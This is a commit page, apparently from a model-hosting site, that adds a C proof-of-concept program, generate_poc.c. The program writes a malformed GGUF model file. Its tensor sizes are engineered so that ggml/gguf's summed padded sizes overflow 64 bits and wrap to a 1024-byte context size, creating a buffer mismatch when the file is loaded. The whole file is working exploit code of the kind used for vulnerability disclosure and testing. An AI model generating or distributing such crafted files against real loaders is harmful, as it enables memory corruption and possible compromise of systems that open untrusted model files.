yuuoniy commited on
Commit
e220fdb
·
verified ·
1 Parent(s): 07169aa

Create generate_poc.c

Browse files
Files changed (1) hide show
  1. generate_poc.c +308 -0
generate_poc.c ADDED
@@ -0,0 +1,308 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <inttypes.h>
2
+ #include <stdint.h>
3
+ #include <stdio.h>
4
+ #include <stdlib.h>
5
+ #include <string.h>
6
+
7
+ #ifndef GGML_MAX_DIMS
8
+ # define GGML_MAX_DIMS 4 // Or what ggml actually uses
9
+ #endif
10
+
11
+ // --- BEGIN: Mimic ggml types and functions needed for PoC ---
12
+ // These should ideally come from linking ggml or including its headers,
13
+ // but for a self-contained PoC, we might need to define minimal versions.
14
+
15
+ typedef enum {
16
+ POC_GGML_TYPE_F32 = 0,
17
+ POC_GGML_TYPE_F16 = 1,
18
+ POC_GGML_TYPE_Q4_0 = 2,
19
+ // ... other types if needed
20
+ } poc_ggml_type;
21
+
22
+ // Simplified function to mimic ggml_type_size
23
+ size_t poc_ggml_type_size(poc_ggml_type type) {
24
+ if (type == POC_GGML_TYPE_F16) {
25
+ return 2;
26
+ }
27
+ if (type == POC_GGML_TYPE_F32) {
28
+ return 4;
29
+ }
30
+ // Add other types as needed for your PoC
31
+ return 0; // Should not happen
32
+ }
33
+
34
+ // Simplified function to mimic ggml_blck_size
35
+ int poc_ggml_blck_size(poc_ggml_type type) {
36
+ // For unquantized types, block size is 1
37
+ if (type == POC_GGML_TYPE_F16 || type == POC_GGML_TYPE_F32) {
38
+ return 1;
39
+ }
40
+ // For quantized types, it's different, e.g., for Q4_0 it might be related to GGML_BLCK_SIZE
41
+ return 1; // Default, adjust if using quantized types
42
+ }
43
+
44
+ // CRUCIAL: This function needs to accurately reflect how ggml_nbytes calculates size,
45
+ // especially how it handles ne (int64_t) and type_size/blck_size.
46
+ // This is where the "expected 0x07..." vs "expected 0xE..." mystery was.
47
+ // Based on the LATEST output, ggml seems to calculate it as (ne * type_size) / blck_size
48
+ // where ne is int64_t, and the multiplication promotes ne to uint64_t if type_size is uint64_t.
49
+ size_t calculate_ggml_nbytes_in_poc(int64_t ne_dim0, poc_ggml_type type) {
50
+ if (ne_dim0 < 0) { // ggml_nelements would return INT64_MIN which then fails an assert
51
+ // For PoC, let's assume ne_dim0 is what ggml_nelements would return if positive
52
+ // Or, if ggml_nelements itself would overflow, we'd need to mimic that.
53
+ // For simplicity now, assume ne_dim0 is the valid total number of elements.
54
+ return 0; // Or handle error
55
+ }
56
+ size_t ts = poc_ggml_type_size(type);
57
+ int bs = poc_ggml_blck_size(type);
58
+ if (bs == 0) {
59
+ return 0; // Avoid division by zero
60
+ }
61
+
62
+ // Mimic (ne * ts) / bs
63
+ // In C, int64_t * uint64_t (if ts is size_t/uint64_t) -> ne promotes to uint64_t
64
+ uint64_t ne_u = (uint64_t) ne_dim0;
65
+ uint64_t num = ne_u * ts; // This multiplication should not overflow uint64_t for our chosen ne_u and ts
66
+ return num / (uint64_t) bs;
67
+ }
68
+
69
+ // --- END: Mimic ggml types ---
70
+
71
+ struct poc_gguf_tensor_info_header {
72
+ uint64_t name_len;
73
+ // char name[]; // Name follows, not fixed size in PoC for simplicity of struct
74
+ };
75
+
76
+ struct poc_gguf_tensor_info_meta {
77
+ uint32_t n_dims;
78
+ int64_t ne[GGML_MAX_DIMS];
79
+ uint32_t type;
80
+ uint64_t offset;
81
+ };
82
+
83
+ #define NUM_POC_TENSORS 2 // Let's try with 2 tensors first
84
+ #define ALIGNMENT 32 // Common GGUF alignment
85
+
86
+ uint64_t POC_GGML_PAD(uint64_t x, uint64_t align) {
87
+ return ((x + align - 1) / align) * align;
88
+ }
89
+
90
+ // Define GGUF_VERSION if not available (e.g., from gguf.h)
91
+ #ifndef GGUF_VERSION
92
+ # define GGUF_VERSION 3 // Common version
93
+ #endif
94
+
95
+ int main(int ac, char ** av) {
96
+ if (ac != 2) {
97
+ printf("usage: %s <filename>\n", av[0]);
98
+ exit(1);
99
+ }
100
+
101
+ const char * filename = av[1];
102
+
103
+ uint32_t version = GGUF_VERSION;
104
+ uint64_t n_tensors_val = NUM_POC_TENSORS;
105
+ uint64_t n_kv_val = 0;
106
+
107
+ // --- Tensor Design for ctx->size overflow to a SMALL value ---
108
+ // Objective: Make the final ggml's ctx->size (sum of padded nbytes) small after overflow.
109
+ // final_ctx_size = (POC_GGML_PAD(nbytes0, ALIGNMENT) + POC_GGML_PAD(nbytes1, ALIGNMENT)) % (UINT64_MAX + 1)
110
+ // We want final_ctx_size to be, e.g., TARGET_CTX_SIZE_AFTER_OVERFLOW.
111
+
112
+ const uint64_t TARGET_CTX_SIZE_AFTER_OVERFLOW =
113
+ 1024ULL; // Must be a multiple of ALIGNMENT. 1024 is fine for ALIGNMENT=32.
114
+
115
+ poc_ggml_type type0 = POC_GGML_TYPE_F16;
116
+ poc_ggml_type type1 = POC_GGML_TYPE_F16;
117
+ size_t ts0 = poc_ggml_type_size(type0);
118
+ size_t ts1 = poc_ggml_type_size(type1);
119
+
120
+ // Design nbytes0 so POC_GGML_PAD(nbytes0, ALIGNMENT) is large
121
+ uint64_t nbytes0_target = 0xD000000000000000ULL;
122
+ // Ensure nbytes0_target is a multiple of ts0 and ALIGNMENT for simplicity
123
+ if (nbytes0_target % ts0 != 0) {
124
+ nbytes0_target = (nbytes0_target / ts0) * ts0;
125
+ }
126
+ if (nbytes0_target % ALIGNMENT != 0) { // Should not happen for 0xD...00 and ALIGNMENT=32
127
+ nbytes0_target = (nbytes0_target / ALIGNMENT) * ALIGNMENT;
128
+ }
129
+
130
+ int64_t ne0 = nbytes0_target / ts0;
131
+ size_t nbytes0 = calculate_ggml_nbytes_in_poc(ne0, type0); // Should be nbytes0_target
132
+
133
+ uint64_t padded_nbytes0 = POC_GGML_PAD(nbytes0, ALIGNMENT);
134
+ printf("Target final ctx->size after overflow: 0x%" PRIx64 "\n", TARGET_CTX_SIZE_AFTER_OVERFLOW);
135
+ printf("Calculated ne0: %" PRId64 "\n", ne0);
136
+ printf("Designed nbytes0: 0x%" PRIx64 ", resulting padded_nbytes0: 0x%" PRIx64 "\n", nbytes0, padded_nbytes0);
137
+
138
+ // Design nbytes1 so (padded_nbytes0 + POC_GGML_PAD(nbytes1, ALIGNMENT)) wraps to TARGET_CTX_SIZE_AFTER_OVERFLOW
139
+ // POC_GGML_PAD(nbytes1, ALIGNMENT) = (UINT64_MAX - padded_nbytes0 + 1) + TARGET_CTX_SIZE_AFTER_OVERFLOW
140
+ uint64_t target_padded_nbytes1 = (0xFFFFFFFFFFFFFFFFULL - padded_nbytes0 + 1ULL) + TARGET_CTX_SIZE_AFTER_OVERFLOW;
141
+
142
+ // We want nbytes1 such that POC_GGML_PAD(nbytes1, ALIGNMENT) == target_padded_nbytes1.
143
+ // Choose nbytes1 = target_padded_nbytes1. This works if target_padded_nbytes1 is a multiple of ALIGNMENT.
144
+ // (It will be if padded_nbytes0 and TARGET_CTX_SIZE_AFTER_OVERFLOW are multiples of ALIGNMENT).
145
+ uint64_t nbytes1_target = target_padded_nbytes1;
146
+ if (nbytes1_target % ts1 != 0) {
147
+ nbytes1_target = (nbytes1_target / ts1) * ts1; // Adjust to be multiple of type size
148
+ // Recalculate target_padded_nbytes1 based on this adjusted nbytes1_target if precision is critical
149
+ // For now, this adjustment is to ensure ne1 is integer. The padding will handle alignment.
150
+ }
151
+ if (nbytes1_target % ALIGNMENT != 0 && POC_GGML_PAD(nbytes1_target, ALIGNMENT) != target_padded_nbytes1) {
152
+ // If nbytes1_target itself doesn't pad up to target_padded_nbytes1,
153
+ // we might need nbytes1_target = target_padded_nbytes1 - k (where k is small)
154
+ // For simplicity, we assume nbytes1_target = target_padded_nbytes1 will work or be close enough
155
+ // if target_padded_nbytes1 is already aligned.
156
+ printf("Warning: nbytes1_target (0x%" PRIx64 ") might not perfectly pad to target_padded_nbytes1 (0x%" PRIx64
157
+ ").\n",
158
+ nbytes1_target, target_padded_nbytes1);
159
+ }
160
+
161
+ int64_t ne1 = nbytes1_target / ts1;
162
+ if (ne1 <= 0) {
163
+ fprintf(stderr,
164
+ "Error: Calculated ne1 (%" PRId64
165
+ ") is not positive. Adjust nbytes0_target or TARGET_CTX_SIZE_AFTER_OVERFLOW.\n",
166
+ ne1);
167
+ exit(1);
168
+ }
169
+ size_t nbytes1 = calculate_ggml_nbytes_in_poc(ne1, type1); // Should ideally be nbytes1_target
170
+
171
+ printf("Calculated ne1: %" PRId64 "\n", ne1);
172
+ printf("Designed nbytes1: 0x%" PRIx64 " (aiming for its padded version to be 0x%" PRIx64 ")\n", nbytes1,
173
+ target_padded_nbytes1);
174
+
175
+ // The existing PoC correctly calculates tm0.offset and tm1.offset
176
+ // to match what gguf.cpp expects based on gguf_add_tensor logic.
177
+ // tm0.offset = 0
178
+ // tm1.offset = POC_GGML_PAD(nbytes0, ALIGNMENT)
179
+
180
+ FILE * fp = fopen(filename, "wb");
181
+ if (!fp) {
182
+ perror("Unable to write out file");
183
+ exit(1);
184
+ }
185
+
186
+ printf("[+] Writing GGUF header: %s\n", filename);
187
+ fwrite("GGUF", 4, 1, fp);
188
+ fwrite(&version, sizeof(version), 1, fp);
189
+ fwrite(&n_tensors_val, sizeof(n_tensors_val), 1, fp);
190
+ fwrite(&n_kv_val, sizeof(n_kv_val), 1, fp);
191
+
192
+ uint64_t calculated_offset_for_ggml = 0; // This mimics ggml's internal ctx->size
193
+
194
+ // --- Tensor 0 ---
195
+ char name0_str[] = "tensor_A";
196
+ struct poc_gguf_tensor_info_header th0;
197
+ struct poc_gguf_tensor_info_meta tm0;
198
+ th0.name_len = strlen(name0_str);
199
+ tm0.n_dims = 1;
200
+ tm0.ne[0] = ne0;
201
+ tm0.type = type0;
202
+ tm0.offset = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
203
+
204
+ fwrite(&th0.name_len, sizeof(th0.name_len), 1, fp);
205
+ fwrite(name0_str, th0.name_len, 1, fp);
206
+ fwrite(&tm0.n_dims, sizeof(tm0.n_dims), 1, fp);
207
+ fwrite(tm0.ne, sizeof(tm0.ne[0]), tm0.n_dims, fp);
208
+ fwrite(&tm0.type, sizeof(tm0.type), 1, fp);
209
+ fwrite(&tm0.offset, sizeof(tm0.offset), 1, fp);
210
+ printf(" - Tensor 0 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64
211
+ ", offset_written: 0x%" PRIx64 ")\n",
212
+ name0_str, tm0.ne[0], tm0.type, nbytes0, tm0.offset);
213
+
214
+ // Update ggml's internal expected offset calculation
215
+ calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
216
+ calculated_offset_for_ggml += nbytes0;
217
+ printf(" ggml's ctx->size after tensor 0 (before next pad): 0x%" PRIx64 "\n", calculated_offset_for_ggml);
218
+
219
+ // --- Tensor 1 ---
220
+ char name1_str[] = "tensor_B";
221
+ struct poc_gguf_tensor_info_header th1;
222
+ struct poc_gguf_tensor_info_meta tm1;
223
+ th1.name_len = strlen(name1_str);
224
+ tm1.n_dims = 1;
225
+ tm1.ne[0] = ne1;
226
+ tm1.type = type1;
227
+ tm1.offset = POC_GGML_PAD(calculated_offset_for_ggml,
228
+ ALIGNMENT); // Offset based on *correctly* calculated previous ctx->size
229
+
230
+ fwrite(&th1.name_len, sizeof(th1.name_len), 1, fp);
231
+ fwrite(name1_str, th1.name_len, 1, fp);
232
+ fwrite(&tm1.n_dims, sizeof(tm1.n_dims), 1, fp);
233
+ fwrite(tm1.ne, sizeof(tm1.ne[0]), tm1.n_dims, fp);
234
+ fwrite(&tm1.type, sizeof(tm1.type), 1, fp);
235
+ fwrite(&tm1.offset, sizeof(tm1.offset), 1, fp);
236
+ printf(" - Tensor 1 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64
237
+ ", offset_written: 0x%" PRIx64 ")\n",
238
+ name1_str, tm1.ne[0], tm1.type, nbytes1, tm1.offset);
239
+
240
+ // Update ggml's internal expected offset calculation (this sum should overflow)
241
+ uint64_t prev_calc_offset = calculated_offset_for_ggml;
242
+ calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT);
243
+ calculated_offset_for_ggml += nbytes1; // <<< POTENTIAL OVERFLOW HERE FOR UINT64_MAX
244
+ printf(
245
+ " PoC's internal calculated_offset_for_ggml after tensor 1 (before next pad for hypothetical T2): 0x%" PRIx64
246
+ " (prev was 0x%" PRIx64 ", added unpadded nbytes1 0x%" PRIx64 " to a padded sum)\n",
247
+ calculated_offset_for_ggml, prev_calc_offset, nbytes1);
248
+ if (calculated_offset_for_ggml < POC_GGML_PAD(prev_calc_offset, ALIGNMENT) &&
249
+ nbytes1 > 0) { // Check for overflow if nbytes1 could cause it
250
+ printf(" >>>> UINT64 OVERFLOW DETECTED in PoC's internal calculated_offset_for_ggml sum <<<<\n");
251
+ }
252
+
253
+ // Verify the sum that ggml.c's ctx->size will actually be
254
+ uint64_t final_gguf_ctx_size_in_ggml_dot_cpp = POC_GGML_PAD(nbytes0, ALIGNMENT) + POC_GGML_PAD(nbytes1, ALIGNMENT);
255
+ printf(" EXPECTED FINAL gguf.cpp ctx->size (sum of padded nbytes): 0x%" PRIx64 "\n",
256
+ final_gguf_ctx_size_in_ggml_dot_cpp);
257
+ if (final_gguf_ctx_size_in_ggml_dot_cpp == TARGET_CTX_SIZE_AFTER_OVERFLOW) {
258
+ printf(" SUCCESS: EXPECTED FINAL gguf.cpp ctx->size matches TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64
259
+ ")!\n",
260
+ TARGET_CTX_SIZE_AFTER_OVERFLOW);
261
+ } else {
262
+ printf(" MISMATCH: EXPECTED FINAL gguf.cpp ctx->size (0x%" PRIx64
263
+ ") != TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64 ")!\n",
264
+ final_gguf_ctx_size_in_ggml_dot_cpp, TARGET_CTX_SIZE_AFTER_OVERFLOW);
265
+ }
266
+
267
+ // Pad the file to ALIGNMENT before writing the dummy tensor data blob
268
+ // This ensures that gguf.cpp's fseek to aligned position doesn't skip parts of our dummy data.
269
+ long current_pos = ftell(fp);
270
+ long padded_pos = POC_GGML_PAD(current_pos, ALIGNMENT);
271
+ if (padded_pos > current_pos) {
272
+ char pad_bytes[ALIGNMENT] = { 0 }; // Max padding needed is ALIGNMENT-1 bytes
273
+ printf(" Padding file from %ld to %ld to align data section.\n", current_pos, padded_pos);
274
+ fwrite(pad_bytes, 1, padded_pos - current_pos, fp);
275
+ }
276
+
277
+ char dummy_data_padding[TARGET_CTX_SIZE_AFTER_OVERFLOW];
278
+ // Initialize VLA using memset
279
+ // First, fill with a pattern that would be unexpected if read by tensor_B
280
+ memset(dummy_data_padding, 0xAA, sizeof(dummy_data_padding));
281
+
282
+ // Now, specifically fill the beginning part for tensor_A (tensor[0])
283
+ // with what gguf_ex_read_1 expects (100.0f for all its elements).
284
+ // We need to know how many elements tensor_A claims to have, at least for the check part.
285
+ // The ne0 is very large, so we can't fill all of it.
286
+ // Let's fill enough for the initial checks/prints in gguf_ex_read_1 (e.g., first 10-20 floats).
287
+ size_t num_elements_to_fill_for_tensor_a = 100; // Fill 20 floats for tensor_A
288
+ if (num_elements_to_fill_for_tensor_a * sizeof(float) > TARGET_CTX_SIZE_AFTER_OVERFLOW) {
289
+ num_elements_to_fill_for_tensor_a = TARGET_CTX_SIZE_AFTER_OVERFLOW / sizeof(float);
290
+ }
291
+
292
+ float tensor_a_expected_value = 100.0f;
293
+ for (size_t k = 0; k < num_elements_to_fill_for_tensor_a; ++k) {
294
+ if ((k + 1) * sizeof(float) <= sizeof(dummy_data_padding)) { // Boundary check
295
+ memcpy(&dummy_data_padding[k * sizeof(float)], &tensor_a_expected_value, sizeof(float));
296
+ } else {
297
+ break; // Stop if we run out of space in dummy_data_padding
298
+ }
299
+ }
300
+ printf(" Filled the first %zu float elements of dummy_data_padding with %f for tensor_A.\n",
301
+ num_elements_to_fill_for_tensor_a, tensor_a_expected_value);
302
+
303
+ fwrite(dummy_data_padding, 1, sizeof(dummy_data_padding), fp);
304
+
305
+ fclose(fp);
306
+ printf("[+] Finished writing PoC GGUF file.\n");
307
+ return 0;
308
+ }